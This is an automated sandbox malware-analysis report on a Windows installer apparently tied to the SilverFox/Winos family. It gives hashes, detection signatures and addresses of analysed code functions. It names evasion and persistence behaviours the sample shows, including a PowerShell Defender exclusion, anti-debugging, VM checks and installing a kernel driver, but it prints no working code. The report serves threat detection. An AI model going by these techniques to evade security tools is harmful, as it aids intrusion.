Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.6.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.6.exe
renamed because original name is a hash value
Original sample name: _2.0.6.exe
Analysis ID: 1579778
MD5: 2fab10855efc0dc62a255ff1e6ec8fa6
SHA1: 0d69a4ea968d50370ee5f7d6e78252f5f61b75f5
SHA256: 869de4431ad5ea6b7513c3e12ff32ecd8b0e93e33c5ab6e3de7bf90de55edc23
Tags: exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Virustotal: Detection: 6% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 83.1% probability
Uses 32bit PE files
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2140314078.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2140505560.0000000001240000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA1AEC0 FindFirstFileA,FindClose, 6_2_6CA1AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00AF6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00AF7496
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.0000000003390000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2082091796.00000000007C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000000.2103564048.000000000115D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.0000000003390000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2082091796.00000000007C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000000.2103564048.000000000115D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: 01 00 00 00 Jump to behavior

System Summary
barindex
PE file contains section with special chars
Source: update.vac.2.dr Static PE information: section name: .=~
Source: hrsw.vbc.6.dr Static PE information: section name: .=~
Source: update.vac.6.dr Static PE information: section name: .=~
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3886
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA25120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle, 6_2_6CA25120
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3C62
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3D18
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA25D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, 6_2_6CA25D60
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3D62
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A39CF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3A6A
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A1950: CreateFileA,DeviceIoControl,CloseHandle, 6_2_6C8A1950
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor, 6_2_6C8A4754
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A4754 6_2_6C8A4754
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8B4A27 6_2_6C8B4A27
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA21880 6_2_6CA21880
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA26A43 6_2_6CA26A43
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA86CE0 6_2_6CA86CE0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF4DE0 6_2_6CAF4DE0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD6D10 6_2_6CAD6D10
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA58EA1 6_2_6CA58EA1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAAAEEF 6_2_6CAAAEEF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADEEF0 6_2_6CADEEF0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA72EC9 6_2_6CA72EC9
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAA4896 6_2_6CAA4896
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEC8D0 6_2_6CAEC8D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE6820 6_2_6CAE6820
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACE810 6_2_6CACE810
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF4870 6_2_6CAF4870
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF6999 6_2_6CAF6999
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEA930 6_2_6CAEA930
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD6900 6_2_6CAD6900
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAFA91A 6_2_6CAFA91A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA58972 6_2_6CA58972
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE8950 6_2_6CAE8950
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE4AA0 6_2_6CAE4AA0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAFAA00 6_2_6CAFAA00
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAB0A52 6_2_6CAB0A52
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACAB90 6_2_6CACAB90
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA60BCA 6_2_6CA60BCA
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEEBC0 6_2_6CAEEBC0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA70B66 6_2_6CA70B66
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAB84AC 6_2_6CAB84AC
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE4489 6_2_6CAE4489
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADE4D0 6_2_6CADE4D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD2580 6_2_6CAD2580
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADC580 6_2_6CADC580
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD45D0 6_2_6CAD45D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAC2521 6_2_6CAC2521
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE8520 6_2_6CAE8520
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF46C0 6_2_6CAF46C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEE600 6_2_6CAEE600
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE67A0 6_2_6CAE67A0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CABC7F3 6_2_6CABC7F3
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA5C7CF 6_2_6CA5C7CF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF67C0 6_2_6CAF67C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADE0E0 6_2_6CADE0E0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD0020 6_2_6CAD0020
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEC2A0 6_2_6CAEC2A0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE8200 6_2_6CAE8200
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF5D90 6_2_6CAF5D90
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAA7D43 6_2_6CAA7D43
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD3D50 6_2_6CAD3D50
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD9E80 6_2_6CAD9E80
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAB1F11 6_2_6CAB1F11
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAC589F 6_2_6CAC589F
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE78C8 6_2_6CAE78C8
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD99F0 6_2_6CAD99F0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD1AA0 6_2_6CAD1AA0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACDAD0 6_2_6CACDAD0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACFA50 6_2_6CACFA50
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA7540A 6_2_6CA7540A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA9F5EC 6_2_6CA9F5EC
